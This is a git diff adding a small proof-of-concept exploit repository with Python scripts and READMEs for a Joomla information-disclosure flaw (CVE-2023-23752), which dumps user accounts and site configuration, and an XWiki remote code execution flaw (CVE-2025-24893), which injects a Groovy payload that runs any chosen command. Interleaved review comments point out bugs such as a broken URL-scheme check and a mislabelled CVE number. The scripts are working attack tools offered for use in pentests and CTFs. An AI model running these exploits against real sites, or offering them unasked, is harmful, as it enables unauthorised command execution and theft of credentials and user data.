diff --git a/CVE-2023-23752/CVE-2023-23752.py b/CVE-2023-23752/CVE-2023-23752.py
new file mode 100644
index 0000000..bef468d
--- /dev/null
+++ b/CVE-2023-23752/CVE-2023-23752.py
@@ -0,0 +1,76 @@
+import requests
+import json
+import argparse
+
+class User:
+ def __init__(user, name, email, lastvisitDate, groupNames):
+ user.name = name
+ user.email = email
+ user.lastvisitDate = lastvisitDate
+ user.groupNames = groupNames
+
+ def __str__(user):
+ return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
+
+def vulnCheck(tgt):
+ verUrl = tgt + "/administrator/manifests/files/joomla.xml"
+ verData = requests.get(verUrl)
+ if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
+ print("[-] Site does not appear to be vulnerable!")
+ raise SystemExit
+
+def getUsers(tgt):
+ usrUrl = tgt + "/api/index.php/v1/users?public=true"
+ usrData = requests.get(usrUrl)
+ if "404" in usrData.text.lower() or "403" in usrData.text.lower():
+ print("[-] Error fetching user data, site may not be vulnerable")
+ raise SystemExit
+ parsedUsrs = json.loads(usrData.text)
+ return parsedUsrs
+
+def parseUsers(usrData):
+ users = []
+ for user in usrData["data"]:
+ userAtribs = user["attributes"]
+ newUser = User(userAtribs["username"],
+ userAtribs["email"],
+ userAtribs["lastvisitDate"],
+ userAtribs["group_names"] )
+ users.append(newUser)
+ return users
+
+def getConfig(tgt):
+ cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
+ cfgData = requests.get(cfgUrl)
+ if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
+ print("[-] Error fetching user data, site may not be vulnerable")
+ raise SystemExit
+ parsedCfg = json.loads(cfgData.text)
+ return parsedCfg
+
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
+ parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
+ args = parser.parse_args()
+
+ tgt = args.target.lower()
+
+ if tgt[4] != "http" and tgt[5] != "https":
+ print("[*] No URL schema specified, defaulting to HTTP")
+ tgt = "http://" + tgt
+
+ vulnCheck(tgt)
+
+ print(f"\n[+] User data found!")
+ print("----------")
+ for user in parseUsers(getUsers(tgt)):
+ print(user)
+ print("----------")
+
+ print(f"\n[+] Config data found!")
+ print("----------")
+ for i in getConfig(tgt)["data"]:
+ print(i["attributes"])
+
diff --git a/CVE-2023-23752/README.md b/CVE-2023-23752/README.md
new file mode 100644
index 0000000..616162e
--- /dev/null
+++ b/CVE-2023-23752/README.md
@@ -0,0 +1,27 @@
+# CVE-2023-23752 - Joomla Information Disclosure
+
+Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
+
+I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
+
+---
+This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
+
+#### User Info
+
+`/api/index.php/v1/config/applicaton?public=true`
+
+#### Config Info
+
+`/api/index.php/v1/config/application?public=true"`
+
+## Usage
+`python3 CVE-2023-23752.py -t `
+
+---
+
+
+# License
+GPL v3.0 - as all good software should be
+
+Remember - don't be a skid :)
diff --git a/CVE-2025-24893/CVE-2025-24893.py b/CVE-2025-24893/CVE-2025-24893.py
new file mode 100644
index 0000000..8579dc7
--- /dev/null
+++ b/CVE-2025-24893/CVE-2025-24893.py
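Review bot: The scheme guard `if tgt[4] != "http" and tgt[5] != "https":` compares single characters against multi-character strings, so it is always true and `http://` is prepended even to a target that already carries a scheme (and a target shorter than six characters raises IndexError); the intended test is `if not tgt.startswith(("http://", "https://")):`. The same line recurs in the CVE-2025-24893.py hunk. vulnCheck, getUsers and getConfig decide success by searching the body text for the digits "404"/"403" instead of checking `verData.status_code`, so any body that happens to contain those digits is misclassified, and `json.loads(usrData.text)` on a non-JSON body raises an unhandled JSONDecodeError rather than the script's own message. getConfig's error message is copy-pasted from getUsers and says "user data" while fetching the config endpoint; `print("[-] Error fetching config data, site may not be vulnerable")` would match what it does. None of the `requests.get` calls pass a `timeout`, so an unresponsive host blocks the script indefinitely.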
@@ -0,0 +1,59 @@
+import requests
+import argparse
+import urllib.parse
+
+# Pretty colors :)
+RED = "\033[31m"
+GREEN = "\033[32m"
+YELLOW = "\033[33m"
+BOLD = "\033[1m"
+RESET = "\033[0m"
+
+def testVuln(target):
+ try:
+ resp = requests.get(target)
+ except requests.exceptions.RequestException as error:
+ print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!")
+ raise SystemExit(error)
+
+ if "xwiki" not in resp.text.lower():
+ print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki")
+ return False
+ else:
+ return True
+
+def exploit(target, cmd):
+ payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}')
+ exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}'
+ try:
+ print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!")
+ resp = requests.get(exploitUrl)
+ except requests.exceptions.RequestException as error:
+ print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!")
+ raise SystemExit(error)
+ print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!")
+
+
+if __name__ == "__main__":
+
+
+ parser = argparse.ArgumentParser(prog='CVE-2025-24893.py',
+ description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki',
+ epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
+ parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
+ parser.add_argument('-c', '--command', required=True, help='Command to execute')
+ args = parser.parse_args()
+
+ print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")
+
+ tgt = args.target.lower()
+ if tgt[4] != "http" and tgt[5] != "https":
+ print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP")
+ tgt = 'http://' + tgt
+
+ if testVuln(tgt):
+ exploit(tgt, args.command)
+ else:
+ raise SystemExit()
+
+
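Review bot: The banner printed after argument parsing names the wrong advisory: `print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")` should read `CVE-2025-24893`, matching the filename and the parser's `prog` and `description`. exploit's closing line "Request successful, check for exploitation!" is printed for any completed request, including a 404 or 500, because `resp` is assigned and then never read; either drop the unused binding or report `resp.status_code` so the message reflects what the server actually answered. testVuln establishes only that the string "xwiki" occurs somewhere in the response body, not that the target runs a version the CVE covers, so the function name overstates its result; a docstring such as `"""Return True if the response body mentions XWiki; does not confirm the version is affected."""` would set the caller's expectations. The scheme guard on `tgt` has the same always-true comparison noted on the CVE-2023-23752.py hunk.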
diff --git a/CVE-2025-24893/README.md b/CVE-2025-24893/README.md
new file mode 100644
index 0000000..f0b4586
--- /dev/null
+++ b/CVE-2025-24893/README.md
@@ -0,0 +1,11 @@
+# CVE-2025-24893 - XWiki RCE
+
+This vuln stems from improper user input sanitization when passing SolrSearch queries. Arbitrary groovy code can be executed due to a direct evaluate() call.
+
+The vulnerable endpoint here is:
+`/xwiki/bin/get/Main/SolrSearch?media=rss&text=`
+
+# License
+GPL v3.0 - as all good software should be
+
+Remember - don't be a skid :)
diff --git a/README.md b/README.md
index 616162e..d1eff05 100644
--- a/README.md
+++ b/README.md
@@ -1,27 +1,11 @@
-# CVE-2023-23752 - Joomla Information Disclosure
+# PoCs
-Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
+This repo contains proof of concept exploits for vulnerabilities I've come across in pentests and CTFs. This goes without saying but I am not liable for any misuse of these scripts, please be responsible.
-I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
-
----
-This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
-
-#### User Info
-
-`/api/index.php/v1/config/applicaton?public=true`
-
-#### Config Info
-
-`/api/index.php/v1/config/application?public=true"`
-
-## Usage
-`python3 CVE-2023-23752.py -t `
-
----
+# Exploits
+- [CVE-2023-23752](https://github.com/0xVoodoo/PoCs/CVE-2023-23752) - Information disclosure in Joomla CMS.
+- [CVE-2025-24893](https://github.com/0xVoodoo/PoCs/CVE-2025-24893) - RCE in XWiki.
 # License
-GPL v3.0 - as all good software should be
-
-Remember - don't be a skid :)
+GPLv3 as all good software (or exploits I guess) should be.